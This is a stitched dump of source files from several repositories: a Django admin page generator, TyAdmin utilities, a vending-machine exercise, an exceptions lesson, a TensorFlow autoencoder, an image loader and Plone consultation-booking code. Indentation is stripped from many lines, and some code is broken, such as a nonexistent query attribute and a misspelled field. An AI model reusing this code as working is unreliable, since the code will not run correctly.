force_cover = settings.TY_ADMIN_CONFIG['FORCED_COVER']
except KeyError:
force_cover = False
gen_labels = SYS_LABELS + user_label_list
model_pic_dict = {}
model_date_dict = {}
model_service_dict = {}
user = get_user_model()
model_list = django.apps.apps.get_models()
for one in model_list:
columns = []
model_name = one._meta.model.__name__
model_ver_name = trans(one._meta.verbose_name_raw)
app_name = one._meta.app_label
model_meta = one.objects.model._meta
if focus_model and model_name != focus_model:
continue
if app_name in gen_labels:
img_field_list = []
date_row_list = []
model_add_item_list = []
model_many_to_many_list = []
model_import_item_list = []
model_service_item_list = []
date_field_list = []
fields_count = len(model_meta.fields)
            # Handle each model field according to its type
for field in model_meta.fields:
field_name = field.name
                # Third-party field rewrites take priority
try:
cur_adapter = FIELD_ADAPTER[app_name][model_name][field_name]
except KeyError:
cur_adapter = None
if cur_adapter and adapter_priority(app_name, model_name, field_name, "index_import"):
model_import_item_list.append(cur_adapter["index_import"])
if cur_adapter and adapter_priority(app_name, model_name, field_name, "effect_state"):
model_add_item_list.append(cur_adapter["effect_state"])
if cur_adapter and adapter_priority(app_name, model_name, field_name, "services"):
model_service_item_list.append(cur_adapter["services"])
if cur_adapter and adapter_priority(app_name, model_name, field_name, "field"):
current_field = cur_adapter["field"]
elif isinstance(field, ForeignKey):
associated_model = field.related_model._meta.object_name
current_field = Field_Template_Factory(field)
# print(current_field)
field_first_up = field_name[0].upper() + field_name[1:]
model_add_item = f"""
const [{field_name}ForeignKeyList, set{field_first_up}ForeignKeyList] = useState([]);
useEffect(() => {{
query{associated_model}({{all: 1}}).then(value => {{
set{field_first_up}ForeignKeyList(value);
}});
}}, []);
const [{field_name}VerboseNameMap, set{field_first_up}VerboseNameMap] = useState([]);
useEffect(() => {{
query{associated_model}VerboseName().then(value => {{
set{field_first_up}VerboseNameMap(value);
}});
}}, []);"""
model_add_item_list.append(model_add_item)
model_import_item = f"""import {{query{associated_model}, query{associated_model}VerboseName}} from '@/pages/AutoGenPage/{associated_model}List/service';"""
if model_import_item not in model_import_item_list and model_name != associated_model:
                    # Handle self-referencing foreign keys
model_import_item_list.append(model_import_item)
elif isinstance(field, CharField):
current_field = Field_Template_Factory(field)
elif isinstance(field, DateTimeField):
current_field = Field_Template_Factory(field)
date_field_list.append('"' + field_name + '"')
date_row_list.append(f'record.{field_name} = record.{field_name} === null ? record.{field_name} : moment(record.{field_name});')
elif isinstance(field, DateField):
current_field = Field_Template_Factory(field)
date_field_list.append('"' + field_name + '"')
date_row_list.append(f'record.{field_name} = record.{field_name} === null ? record.{field_name} : moment(record.{field_name});')
elif isinstance(field, BooleanField):
current_field = Field_Template_Factory(field)
elif isinstance(field, IntegerField):
current_field = Field_Template_Factory(field)
elif isinstance(field, FloatField):
current_field = Field_Template_Factory(field)
elif isinstance(field, ImageField) or isinstance(field, SImageField):
img_field_list.append('"' + field_name + '"')
current_field = Field_Template_Factory(field)
elif isinstance(field, FileField):
img_field_list.append('"' + field_name + '"')
current_field = Field_Template_Factory(field)
elif isinstance(field, TextField):
current_field = Field_Template_Factory(field)
elif field.__class__.__name__ == "UEditorField" or isinstance(field, richTextField):
current_field = Field_Template_Factory(field)
elif field.__class__.__name__ == "TimeZoneField":
current_field = Field_Template_Factory(field)
else:
current_field = Field_Template_Factory(field)
# print(current_field)
model_pic_dict[model_name] = img_field_list
model_date_dict[model_name] = date_field_list
columns.append(current_field)
model_service_dict[model_name] = model_service_item_list
            # Handle many-to-many relations
for field in model_meta.many_to_many:
associated_model = field.related_model._meta.object_name
if style_adapter_priority(app_name, model_name, field.name, "many_to_many"):
try:
many_style = settings.TY_ADMIN_CONFIG["REWRITE"][app_name][model_name][field.name]["many_to_many"]
except KeyError:
many_style = ty_admin_settings.TY_ADMIN_CONFIG["REWRITE"][app_name][model_name][field.name]["many_to_many"]
else:
many_style = None
current_field = Field_Template_Factory(field, many=True, manyStyle=many_style)
field_name = field.name
field_first_up = field_name[0].upper() + field_name[1:]
model_many_to_many_item = f"""const [{field.name}ManyToManyList, set{field_first_up}ManyToManyList] = useState([]);
useEffect(() => {{
query{associated_model}({{all:1}}).then(value => {{
set{field_first_up}ManyToManyList(value);
}});
}}, []);"""
model_many_to_many_list.append(model_many_to_many_item)
model_import_item = f"""import {{query{associated_model}}} from '@/pages/AutoGenPage/{associated_model}List/service';"""
if model_import_item not in model_import_item_list and model_name != associated_model:
model_import_item_list.append(model_import_item)
columns.append(current_field)
if app_name == user._meta.app_label and model_name == user._meta.object_name:
opera = UserOptionColumn.replace(">>MODEL_NAME<<", model_ver_name)
else:
opera = GeneralOptionColumn.replace(">>MODEL_NAME<<", model_ver_name)
opera = opera.replace(">>TIME_DEAL_PLACEHOLDER<<", "".join(date_row_list))
columns.append(opera)
dest_path = f'{os.path.dirname(__file__)}/antd_page_templates/{template_type}'
with open(f'{dest_path}/index.jsx', encoding='utf-8') as fr:
content = fr.read()
if fields_count > 8:
new_content = content.replace(">>TWO_COLUMNS_COL<<", "twoColumns")
else:
new_content = content.replace(">>TWO_COLUMNS_COL<<", "{}")
new_content = new_content.replace(">>COLUMNS_LIST<<", "".join(columns))
new_content = new_content.replace(">>MODEL_NAME<<", model_name)
new_content = new_content.replace(">>MODEL_VERBOSE_NAME<<", str(model_ver_name))
new_content = new_content.replace(">>FOREIGNKEY_PLACE<<", "".join(model_add_item_list))
new_content = new_content.replace(">>MANY_TO_MANY_PLACE<<", "".join(model_many_to_many_list))
new_content = new_content.replace(">>IMPORT_PLACE<<", "".join(model_import_item_list))
new_content = new_content.replace(">>TIME_PLACE<<", ",".join(model_date_dict[model_name]))
if app_name == user._meta.app_label and model_name == user._meta.object_name:
                # Allow the user model to update its own password
new_content = new_content.replace(">>PASSWORD_FORM<<", PASSWORD_FORM)
new_content = new_content.replace(">>PASSWORD_PLACE<<", PASSWORD_PLACE)
new_content = new_content.replace(">>UPDATE_PASSWORD_METHOD<<", UPDATE_PASSWORD_METHOD)
new_content = new_content.replace(">>PASSWORD_UPDATE_FORM<<", PASSWORD_UPDATE_FORM)
else:
new_content = new_content.replace(">>PASSWORD_FORM<<", "")
new_content = new_content.replace(">>PASSWORD_PLACE<<", '')
new_content = new_content.replace(">>UPDATE_PASSWORD_METHOD<<", '')
new_content = new_content.replace(">>PASSWORD_UPDATE_FORM<<", '')
with open(f'{dest_path}/service.js', encoding='utf-8') as fr:
content = fr.read()
new_services = content.replace(">>MODEL_NAME_LOWER_CASE<<", get_lower_case_name(model_name))
new_services = new_services.replace(">>MODEL_NAME<<", model_name)
new_services = new_services.replace(">>IMAGE_FIELD_LIST<<", ",".join(model_pic_dict[model_name]))
new_services = new_services.replace(">>ADAPTER_SERVICE<<", "\n".join(model_service_dict[model_name]))
if app_name == user._meta.app_label:
new_services = new_services.replace(">>UPDATE_PASSWORD_SERVICE<<", """
export async function updateUserPassword(params) {
return request('/api/xadmin/v1/list_change_password', {
method: 'POST',
data: { ...params},
});
}""")
else:
new_services = new_services.replace(">>UPDATE_PASSWORD_SERVICE<<", "")
with open(f'{dest_path}/components/CreateForm.jsx', encoding='utf-8') as fr:
create_form = fr.read()
create_form = create_form.replace(">>MODEL_VERBOSE_NAME<<", str(model_ver_name))
if fields_count > 8:
create_form = create_form.replace(">>WIDTH_PLACEHOLDER<<", 'width={1200}')
else:
create_form = create_form.replace(">>WIDTH_PLACEHOLDER<<", "width={800}")
with open(f'{dest_path}/components/UpdateForm.jsx', encoding='utf-8') as fr:
update_form = fr.read()
update_form = update_form.replace(">>MODEL_VERBOSE_NAME<<", str(model_ver_name))
if fields_count > 8:
update_form = update_form.replace(">>WIDTH_PLACEHOLDER<<", 'width={1200}')
else:
update_form = update_form.replace(">>WIDTH_PLACEHOLDER<<", "width={800}")
with open(f'{dest_path}/components/UpdatePasswordForm.jsx', encoding='utf-8') as fr:
change_password_form = fr.read()
target_path = f'{settings.BASE_DIR}/tyadmin/src/pages/AutoGenPage'
cur_path = f'{target_path}/{model_name}List'
if not os.path.exists(cur_path):
os.makedirs(cur_path)
cur_path_co = f'{target_path}/{model_name}List/components'
if not os.path.exists(cur_path_co):
os.makedirs(cur_path_co)
index_jsx_path = f'{target_path}/{model_name}List/index.jsx'
if not force_cover and os.path.exists(index_jsx_path):
pass
else:
with open(index_jsx_path, 'w', encoding='utf-8') as fw:
fw.write(new_content)
service_jsx_path = f'{target_path}/{model_name}List/service.js'
if not force_cover and os.path.exists(service_jsx_path):
pass
else:
with open(service_jsx_path, 'w', encoding='utf-8') as fw:
fw.write(new_services)
create_form_path = f'{target_path}/{model_name}List/components/CreateForm.jsx'
if not force_cover and os.path.exists(create_form_path):
pass
else:
with open(create_form_path, 'w', encoding='utf-8') as fw:
fw.write(create_form)
update_form_path = f'{target_path}/{model_name}List/components/UpdateForm.jsx'
if not force_cover and os.path.exists(update_form_path):
pass
else:
with open(update_form_path, 'w', encoding='utf-8') as fw:
fw.write(update_form)
if app_name == user._meta.app_label:
update_password_form_path = f'{target_path}/{model_name}List/components/UpdatePasswordForm.jsx'
if not force_cover and os.path.exists(update_password_form_path):
pass
else:
with open(update_password_form_path, 'w', encoding='utf-8') as fw:
fw.write(change_password_form)
if __name__ == '__main__':
    # settings_name = input("Enter the project settings module path: ")
name = "tyadmin_demo.settings"
gen_antd_pages(name, None)
```
#### File: tyadmin_api_cli/tyadmin_api_init/utils.py
```python
import datetime
import time
import uuid
from tyadmin_api.models import TyAdminSysLog
def log_save(user, request, flag, message, log_type):
log = TyAdminSysLog(
user_name=user,
ip_addr=request.META['REMOTE_ADDR'],
action_flag=flag,
message=message,
log_type=log_type
)
log.save()
# encoding: utf-8
from random import Random
from django.conf import settings
from django.core.mail import EmailMessage
from tyadmin_api.models import TyAdminEmailVerifyRecord
def random_str(random_length=8):
str_base = ''
chars = 'AaBbCcDdEeFfGgHhIiJjKkLlMmNnOoPpQqRrSsTtUuVvWwXxYyZz0123456789'
length = len(chars) - 1
random = Random()
for i in range(random_length):
str_base += chars[random.randint(0, length)]
return str_base
def send_email(email, send_type="login_auth"):
email_record = TyAdminEmailVerifyRecord()
if send_type == "login_auth":
code = random_str(4)
else:
code = random_str(16)
email_record.code = code
email_record.email = email
email_record.send_type = send_type
email_record.save()
if send_type == "login_auth":
email_title = "平台 邮箱登录验证码"
email_body = f"验证码为: {code}, 请在五分钟内填写!"
msg = EmailMessage(email_title, email_body, settings.EMAIL_FROM, [email])
msg.content_subtype = "html"
send_status = msg.send()
if send_status:
pass
def save_uploaded_file(f, to_path):
with open(to_path, 'wb+') as to_file:
for chunk in f.chunks():
to_file.write(chunk)
def gen_file_name(file_name):
today = datetime.date.today()
name = str(today) + "-" + str(uuid.uuid4()) + "-" + file_name
return name
if __name__ == '__main__':
gen_file_name("123")
``` |
{
"source": "a250/msai-python",
"score": 4
} |
#### File: msai-python/HA3-Zyablitsev/vend_machine.py
```python
class VENDMACHINE():
def __init__(self, init_state):
self.shelves = init_state['shelves']
self.account = init_state['account']
self.height = len(self.shelves)
self.width = len(self.shelves[0])
self.customer_account = init_state['customer_account']
def put_in(self, name: str, price: float, qty: int, x: int, y: int) -> bool:
if (y > self.height - 1) or (x > self.width - 1):
return False
if self.shelves[y][x] is None:
item = {'name': name, 'price': price, 'qty': qty}
self.shelves[y][x] = item
return True
else:
return False
    def purchase(self, x: int, y: int) -> bool:
        if (y > self.height - 1) or (x > self.width - 1):  # invalid coordinates
            print(f'wrong {x=}, {y=}')
            return False
        if self.shelves[y][x] is None:  # selected box is empty
            print(f'box {x=},{y=} empty')
            return False
        if self.customer_account['cash_now'] < self.shelves[y][x]['price']:  # not enough money
            print('not enough money')
            return False
        self.customer_account['cash_now'] -= self.shelves[y][x]['price']
        self.shelves[y][x]['qty'] -= 1
        if self.shelves[y][x]['qty'] == 0:
            self.shelves[y][x] = None
        return True
def add_money(self, cash_sum: float) -> float:
# print(f'putting ${cash_sum} money')
self.customer_account['cash_now'] += cash_sum
return self.customer_account['cash_now']
    def take_moneyback(self) -> float:
        # Return the refunded amount, as the annotation promises.
        cash = self.customer_account['cash_now']
        self.customer_account['cash_now'] = 0
        return cash
    def showcase(self):
        for shelf in self.shelves:
            shelf_view_1 = ''
            shelf_view_2 = ''
            shelf_view_3 = ''
            # Defined outside the branch so empty boxes don't raise NameError.
            separator = '|------------'
            for box in shelf:
                if box is not None:
                    item = box.get('name')
                    price = '$' + str(box.get('price'))
                    qty = str(box.get('qty'))
                    info = price + ': x' + qty
                else:
                    item = 'none'
                    info = ''
                shelf_view_1 += f' | {item: <10}'
                shelf_view_2 += f' | {info: <10}'
                shelf_view_3 += f' {separator:<10}'
            print(shelf_view_1 + '|')
            print(shelf_view_2 + '|')
            print(shelf_view_3 + '|')
        print(f'\nCustomer cash: ${self.customer_account["cash_now"]}')
if __name__ == '__main__':
vending_machine = {
'shelves': [[{'name': 'candy', 'price': 10, 'qty': 3},
{'name': 'bread', 'price': 8, 'qty': 5},
{'name': 'pepsi', 'price': 20, 'qty': 6},
{'name': 'milk', 'price': 7, 'qty': 4}],
[None, None, None, None],
[None, None, None, None]],
'account': {'total_sum': 1000.10, 'coins': {1: 10, 5: 15, 10: 23, 50: 12}},
'customer_account': {'state': 'selecting',
'cash_now': 15,
'choice': {'x': None, 'y': None}}
}
print('----\nHere is our Vending Machine\n\n')
VM = VENDMACHINE(vending_machine)
VM.showcase() # show initial state
print('----\nAdding money\n')
VM.add_money(3.5)
VM.showcase()
print('----\nPutting items inside\n')
VM.put_in('bread', 3, 2, 1, 1)
VM.showcase()
print('----\nDo purchase\n')
VM.purchase(1,1)
VM.showcase()
print('----\nGet money back\n')
VM.take_moneyback()
VM.showcase()
```
#### File: week15_exceptions_open_with/seminar/exception_learning.py
```python
import requests
try:
response = requests.get('https://goojdiudoeiwul3dgle.com/')
except (requests.ConnectionError, requests.Timeout):
print('ConnectionError happened')
raise # re raising caught exception
except requests.RequestException as e:
print(f'Something goes wrong in requests: {type(e)} {e}')
raise # re raising caught exception
else:
print(response)
finally:
print('Request handling is finished')
class StrListException(Exception):
def __init__(self, data=None, *args):
super().__init__(*args)
self.data = data
class WrongType(StrListException, TypeError):
pass
class WrongSize(StrListException, ValueError):
pass
class StrList:
"""
StrList is list-like container for strings.
"""
@classmethod
def _validate_state(cls, state: list[str] | None) -> list[str]:
if state is None:
return []
if not isinstance(state, list):
raise WrongType(f'state of {cls.__name__} must be list[str]')
for element in state:
if not isinstance(element, str):
raise WrongType(f'state of {cls.__name__} must be list[str]')
return state
@staticmethod
def _validate_str(element: str) -> str:
if not isinstance(element, str):
raise WrongType('element must be str')
return element
@staticmethod
def _validate_int(value: int) -> int:
if not isinstance(value, int):
raise WrongType('value must be int')
if value <= 0:
raise WrongSize('value must be positive integer')
return value
# ...
try:
StrList._validate_int(10)
except StrListException:
pass
``` |
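Continuing the same module, a brief usage sketch (assumed): the validators raise the custom exceptions, which can be caught either via the shared StrListException base or via the built-in types they also subclass:

```python
try:
    StrList._validate_int(-3)
except WrongSize as e:
    print(type(e).__name__, e)  # WrongSize: value must be positive integer

try:
    StrList._validate_state(["a", 1])
except TypeError as e:  # WrongType is also a TypeError
    print(type(e).__name__, e)
```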
{
"source": "a25765564/MLtest",
"score": 3
} |
#### File: a25765564/MLtest/mnist.py
```python
import numpy as np
import sklearn.preprocessing as prep
import tensorflow as tf
from tensorflow.examples.tutorials.mnist import input_data
def xavier_init(fan_in,fan_out,constant = 1):
low = -constant * np.sqrt(6.0 /(fan_in + fan_out))
high = constant * np.sqrt(6.0 /(fan_in + fan_out))
return tf.random_uniform((fan_in,fan_out),minval= low,maxval = high,dtype = tf.float32)
class AdditiveGaussianNoiseAutoencoder(object):
def __init__(self,n_input,n_hidden,transfer_function= tf.nn.softplus,optimizer= tf.train.AdamOptimizer(),scale=0.1):
self.n_input = n_input
self.n_hidden = n_hidden
self.transfer = transfer_function
self.scale = tf.placeholder(tf.float32)
self.training_scale = scale
network_weights = self._initialize_weights()
self.weights = network_weights
self.x = tf.placeholder(tf.float32,[None,self.n_input])
self.hidden = self.transfer(tf.add(tf.matmul(self.x+scale * tf.random_normal((n_input,)),
self.weights['w1']),self.weights['b1']))
self.reconstruction = tf.add(tf.matmul(self.hidden,self.weights['w2']),self.weights['b2'])
self.cost = 0.5 * tf.reduce_sum(tf.pow(tf.subtract(self.reconstruction,self.x),2.0))
self.optimizer = optimizer.minimize(self.cost)
init = tf.global_variables_initializer()
self.sess = tf.Session()
self.sess.run(init)
def _initialize_weights(self):
all_weights = dict()
all_weights['w1'] = tf.Variable(xavier_init(self.n_input,self.n_hidden))
all_weights['b1'] = tf.Variable(tf.zeros([self.n_hidden],dtype = tf.float32))
all_weights['w2'] = tf.Variable(tf.zeros([self.n_hidden,self.n_input],dtype = tf.float32))
all_weights['b2'] = tf.Variable(tf.zeros([self.n_input],dtype = tf.float32))
return all_weights
def partial_fit(self,X):
cost, opt = self.sess.run((self.cost,self.optimizer),feed_dict= {self.x:X,self.scale:self.training_scale})
return cost
def calc_total_cost(self,X):
return self.sess.run(self.cost,feed_dict={self.x:X,self.scale:self.training_scale})
def transform(self,X):
return self.sess.run(self.hidden,feed_dict={self.x:X,self.scale:self.training_scale})
    def generate(self, hidden=None):
        if hidden is None:
            # Sample one random hidden vector when none is supplied;
            # the hidden layer has n_hidden units.
            hidden = np.random.normal(size=self.n_hidden)
        return self.sess.run(self.reconstruction, feed_dict={self.hidden: hidden})
def reconstruct(self,X):
return self.sess.run(self.reconstruction,feed_dict={self.x:X,self.scale:self.training_scale})
def getWeights(self):
return self.sess.run(self.weights['w1'])
    def getBiases(self):
        return self.sess.run(self.weights['b1'])
mnist = input_data.read_data_sets('MNIST_DATA',one_hot=True)
def standard_scale(X_train,X_test):
preprocessor = prep.StandardScaler().fit(X_train)
X_train = preprocessor.transform(X_train)
X_test = preprocessor.transform(X_test)
return X_train,X_test
def get_random_block_from_data(data,batch_size):
start_index = np.random.randint(0,len(data) - batch_size)
return data[start_index:(start_index + batch_size)]
X_train, X_test = standard_scale(mnist.train.images, mnist.test.images)
n_samples = int(mnist.train.num_examples)
training_epochs = 200
batch_size = 128
display_step = 1
autoencoder = AdditiveGaussianNoiseAutoencoder(n_input = 784,n_hidden= 200,transfer_function = tf.nn.softplus,
optimizer = tf.train.AdamOptimizer(learning_rate = 0.001),
scale = 0.01)
for epoch in range(training_epochs):
avg_cost = 0.
total_batch = int(n_samples /batch_size)
for i in range(total_batch):
        batch_xs = get_random_block_from_data(X_train, batch_size)
cost = autoencoder.partial_fit(batch_xs)
avg_cost += cost /n_samples * batch_size
if epoch % display_step == 0:
print("Epoch:",'%04d'%(epoch+1),"cost=","{:.9f}".format(avg_cost))
print ("total cost:" + str(autoencoder.calc_total_cost(X_test)))
```
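As a follow-up sketch (not in the original script), the trained autoencoder can be sanity-checked by reconstructing a few standardized test digits once the loop above finishes:

```python
# Reconstruct five test digits with the trained model.
sample = X_test[:5]
reconstructed = autoencoder.reconstruct(sample)
print(reconstructed.shape)  # (5, 784): denoised reconstructions
```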
#### File: a25765564/MLtest/tf_classfication01.py
```python
import tensorflow as tf
import skimage
from skimage import data
import os
def load_data(data_directory):
directories = [d for d in os.listdir(data_directory)
if os.path.isdir(os.path.join(data_directory, d))]
labels = []
images = []
for d in directories:
label_directory = os.path.join(data_directory, d)
file_names = [os.path.join(label_directory, f)
for f in os.listdir(label_directory)
if f.endswith(".ppm")]
for f in file_names:
            images.append(io.imread(f))
labels.append(int(d))
return images, labels
ROOT_PATH = "F:\\kaggle\\belgiumTSC"
train_data_directory = os.path.join(ROOT_PATH, "Training")
test_data_directory = os.path.join(ROOT_PATH, "Testing")
images, labels = load_data(train_data_directory)
# load_data returns plain Python lists; wrap images in a numpy array
# so the ndim/size inspection below works.
import numpy as np
images = np.array(images)
# Print the number of dimensions of 'images'
print(images.ndim)
# Print the number of elements of 'images'
print(images.size)
images[0]
# Show a histogram of the labels across the 62 classes
import matplotlib.pyplot as plt
plt.hist(labels, 62)
plt.show()
``` |
{
"source": "a25kk/lra",
"score": 2
} |
#### File: lra/cos/appointments.py
```python
from lra.cos.interfaces import IConsultationAppointmentLocator, \
IConsultationAppointmentGenerator
from sqlalchemy import Table, func
from sqlalchemy import schema as sqlalchemy_schema
from sqlalchemy import types as sqlalchemy_types
from z3c.saconfig import Session
from zope import schema
from zope.interface import Interface, implementer
from lra.cos import ORMBase
from lra.cos import _
from zope.sqlalchemy import register
metadata = ORMBase.metadata
class IConsultationAppointment(Interface):
""" A consultation appointment """
consultationAppointmentId = schema.Int(
title=_(u"Consultation appointment identifier"),
)
consultationAppointmentCode = schema.TextLine(
title=_(u"Consultation appointment code"),
)
consultationSlotCode = schema.TextLine(
title=_(u"Consultation slot code"),
)
consultationAppointmentTimeStamp = schema.Datetime(
title=_(u"Consultation appointment generated time stamp"),
)
privacy_notice = schema.Bool(
title=_(u"Privacy notice accepted?"),
)
data_protection_notice = schema.Bool(
title=_(u"Date protection notice accepted?"),
)
consultationAppointmentContactEmail = schema.TextLine(
title=_(u"Consultation contact email"),
)
consultationAppointmentContactSalutation = schema.TextLine(
title=_(u"Consultation contact salutation"),
)
consultationAppointmentContactFirstName = schema.TextLine(
title=_(u"Consultation contact first name"),
)
consultationAppointmentContactLastName = schema.TextLine(
title=_(u"Consultation contact last name"),
)
consultationAppointmentConstructionYear = schema.TextLine(
title=_(u"Consultation appointment construction year"),
)
consultationAppointmentRequest = schema.Text(
title=_(u"Consultation appointment request"),
)
@implementer(IConsultationAppointment)
class ConsultationAppointment(ORMBase):
""" Database-backed implementation of IConsultationAppointment """
__tablename__ = 'consultation_appointment'
consultationAppointmentId = sqlalchemy_schema.Column(
sqlalchemy_types.Integer(),
primary_key=True,
autoincrement=True,
)
    # Generated via secrets.token_urlsafe
consultationAppointmentCode = sqlalchemy_schema.Column(
sqlalchemy_types.String(64),
nullable=False,
)
    # Generated via secrets.token_urlsafe
consultationSlotCode = sqlalchemy_schema.Column(
sqlalchemy_types.String(64),
nullable=False,
)
consultationAppointmentTimeStamp = sqlalchemy_schema.Column(
sqlalchemy_types.DateTime(),
nullable=False,
server_default=func.now()
)
privacy_notice = sqlalchemy_schema.Column(
sqlalchemy_types.Boolean(),
nullable=False,
)
data_protection_notice = sqlalchemy_schema.Column(
sqlalchemy_types.Boolean(),
nullable=False,
)
consultationAppointmentContactEmail = sqlalchemy_schema.Column(
sqlalchemy_types.String(120),
nullable=False,
)
consultationAppointmentContactSalutation = sqlalchemy_schema.Column(
sqlalchemy_types.String(120),
nullable=False,
)
consultationAppointmentContactFirstName = sqlalchemy_schema.Column(
sqlalchemy_types.String(120),
nullable=False,
)
consultationAppointmentContactLastName = sqlalchemy_schema.Column(
sqlalchemy_types.String(120),
nullable=False,
)
consultationAppointmentConstructionYear = sqlalchemy_schema.Column(
sqlalchemy_types.String(64),
nullable=False,
)
consultationAppointmentRequest = sqlalchemy_schema.Column(
sqlalchemy_types.Text(),
nullable=False,
)
#consultation_appointment = Table('consultation_appointment', metadata)
@implementer(IConsultationAppointmentLocator)
class ConsultationAppointmentLocator(object):
""" Utility to locate available consultation slots """
@staticmethod
def available_appointments(from_date):
"""Return a list of all appointments for particular time slots
on the specified dates.
Returns a list of dictionaries with keys 'timeSlotCode', 'appointmentCode',
and 'email'.
"""
results = Session.query(ConsultationAppointment).filter(
ConsultationAppointment.showTime.after(from_date)
)
appointments = [dict(appointment_id=row.consutationAppointmentId,
consultation_slot_code=row.consultationSlotCode,
appointment_code=row.consultationAppointmentCode,
appointment_email=row.consultationAppointmentContactEmail
)
for row in results]
return appointments
@implementer(IConsultationAppointmentGenerator)
class ConsultationAppointmentGenerator(object):
""" Utility to generate new consultation slots """
def __call__(self, appointment_request):
"""Make a consultation appointment
"""
# Make sure the time slot is still available
# TODO: check for data validity
session = Session()
register(session)
session().add(appointment_request)
```
#### File: cos/browser/manager.py
```python
import datetime
import secrets
from dateutil.relativedelta import relativedelta
from Acquisition import aq_inner
from babel.dates import format_datetime
from lra.cos.consultationslots import ConsultationSlot
from lra.cos.interfaces import IConsultationSlotGenerator, TimeSlotGenerationError, \
IConsultationSlotLocator
from plone import api
from plone.autoform import directives
from plone.autoform.form import AutoExtensibleForm
from plone.protect.utils import addTokenToUrl
from plone.supermodel import model
from plone.z3cform.layout import FormWrapper
from Products.Five.browser import BrowserView
from z3c.form import button, form
from zope import schema
from zope.component import getUtility
from zope.interface import implementer
from zope.publisher.interfaces import IPublishTraverse
from plone.app.z3cform.widget import DatetimeFieldWidget
from zope.schema.interfaces import IVocabularyFactory
from lra.cos import _
def next_weekday(d, weekday):
days_ahead = weekday - d.weekday()
if days_ahead <= 0: # Target day already happened this week
days_ahead += 7
return d + datetime.timedelta(days_ahead)
def time_slot_date_default_value():
today = datetime.datetime.today()
next_thursday = next_weekday(today, 3)
return next_thursday
def time_slot_dates_until_default_value():
    today = datetime.datetime.today()
    next_thursday = next_weekday(today, 3)
    # months=1 adds one month; relativedelta(month=1) would instead pin
    # the month attribute to January.
    return next_thursday + relativedelta(months=1)
class ManageTimeSlots(BrowserView):
""" Consulting schedule view """
@staticmethod
def is_editable():
editable = False
if not api.user.is_anonymous():
editable = True
return editable
def show_toolbar(self):
context = aq_inner(self.context)
display_toolbar = False
if self.is_editable():
# Explicitly check for permissions
current_user = api.user.get_current()
display_toolbar = api.user.has_permission(
"LRA Consultation Slots: Manage Slots", user=current_user, obj=context
)
return display_toolbar
@staticmethod
def stored_time_slots():
locator = getUtility(IConsultationSlotLocator)
from_date = datetime.datetime.now()
try:
stored_slots = locator.available_slots(from_date)
return stored_slots
        except Exception:
return list()
def has_available_time_slots(self):
return len(self.stored_time_slots()) > 0
def available_time_slots(self):
context = aq_inner(self.context)
stored_slots = self.stored_time_slots()
available_slots = list()
for time_slot in stored_slots:
booking_url = "{0}/@@book-appointment/{1}".format(
context.absolute_url(),
time_slot["slot_code"]
)
time_slot.update({
"slot_booking_url": booking_url,
"slot_start": self.timestamp(time_slot['slot_time']),
"slot_end": self.timestamp(time_slot['slot_time_end'])
})
available_slots.append(time_slot)
return available_slots
def rendered_widget(self):
context = aq_inner(self.context)
view_name = "@@content-widget-lra-consultation-schedule"
rendered_widget = context.restrictedTraverse(view_name)()
return rendered_widget
def timestamp(self, slot_date):
context = aq_inner(self.context)
date = slot_date
timestamp = {
'day': date.strftime("%d"),
'day_name': format_datetime(date, 'EEEE', locale='de'),
'month': date.strftime("%m"),
'month_name': format_datetime(date, 'MMMM', locale='de'),
'year': date.strftime("%Y"),
'hour': date.strftime('%H'),
'minute': date.strftime('%M'),
'time': date.strftime('%H.%M'),
'date': date
}
return timestamp
class ITimeSlotAddForm(model.Schema):
time_slot = schema.Datetime(
title=_(u"Consultation Date"),
description=_(u"Please enter a date for consultations on schedule"),
required=True,
defaultFactory=time_slot_date_default_value,
)
directives.widget("time_slot", DatetimeFieldWidget, pattern_options={"time": False})
time_slots_until = schema.Datetime(
title=_(u"Time Slot Creation Until (Optional)"),
description=_(u"Please enter a future date for iterative creation"),
required=False,
defaultFactory=time_slot_dates_until_default_value,
)
directives.widget(
"time_slots_until", DatetimeFieldWidget, pattern_options={"time": False}
)
time_slots_creation = schema.Bool(
title=_(u"Time Slot Creation"),
description=_(u"Enable automatic creation of time slots between the "
u"specified start and end days. When not activated slots "
u"will only be created for the specific consultation date."),
required=False,
default=False
)
@implementer(IPublishTraverse)
class TimeSlotAddForm(AutoExtensibleForm, form.Form):
"""This search form enables you to find users by specifying one or more
search criteria.
"""
schema = ITimeSlotAddForm
ignoreContext = True
css_class = "o-form o-form--widget"
label = _(u"Consultation time slots")
enableCSRFProtection = True
formErrorsMessage = _(u"There were errors.")
submitted = False
@property
def action(self):
""" Rewrite HTTP POST action.
# If the form is rendered embedded on the others pages we
make sure the form is posted through the same view always,
instead of making HTTP POST to the page where the form was rendered.
"""
return self.context.absolute_url() + "/@@create-time-slot-form"
@property
def next_url(self):
context = aq_inner(self.context)
url = "{0}/@@manage-time-slots".format(context.absolute_url())
return url
def configured_time_slots(self):
context = aq_inner(self.context)
time_slots = list()
stored_time_slots = getattr(context, "time_slots", None)
if stored_time_slots:
for slot in stored_time_slots:
slot_values = slot.split("|")
time_slots.append({"start": slot_values[0], "end": slot_values[1]})
return time_slots
@staticmethod
def _compose_time_slot_data(
date_base, slot_hour, slot_minutes, slot_hour_end, slot_minutes_end
):
slot = {
"slot_code": secrets.token_urlsafe(64),
"slot_time": date_base.replace(
hour=int(slot_hour), minute=int(slot_minutes), second=00
),
"slot_time_end": date_base.replace(
hour=int(slot_hour_end), minute=int(slot_minutes_end), second=00
),
"bookable": True,
}
return slot
def generate_time_slots(self, consultation_date):
generated_time_slots = list()
configured_slots = self.configured_time_slots()
for desired_slot in configured_slots:
# Iterate over configured desired time slots and generate
# datetime objects
try:
slot_start = desired_slot["start"].split(":")
slot_end = desired_slot["end"].split(":")
slot_data = self._compose_time_slot_data(
consultation_date,
slot_start[0],
slot_start[1],
slot_end[0],
slot_end[1],
)
generated_time_slots.append(slot_data)
except IndexError:
# Some exception handler should be in place
pass
return generated_time_slots
def prepare_time_slots(self, data):
time_slots = list()
cycle_date = data["time_slot"]
if data["time_slots_creation"]:
cycle_end = data["time_slots_until"]
else:
cycle_end = cycle_date
        # timedelta has no "month" keyword; step one week at a time so
        # every generated date keeps the weekday of the start date
        # (assumed intent, matching the next-Thursday defaults above).
        step = datetime.timedelta(days=7)
days_in_cycle = list()
while cycle_date <= cycle_end:
days_in_cycle.append(cycle_date)
cycle_date += step
if days_in_cycle:
# Generate time slots for all stored time slots
for single_date in days_in_cycle:
time_slots.extend(self.generate_time_slots(single_date))
return time_slots
def applyChanges(self, data):
generator = getUtility(IConsultationSlotGenerator)
time_slots = self.prepare_time_slots(data)
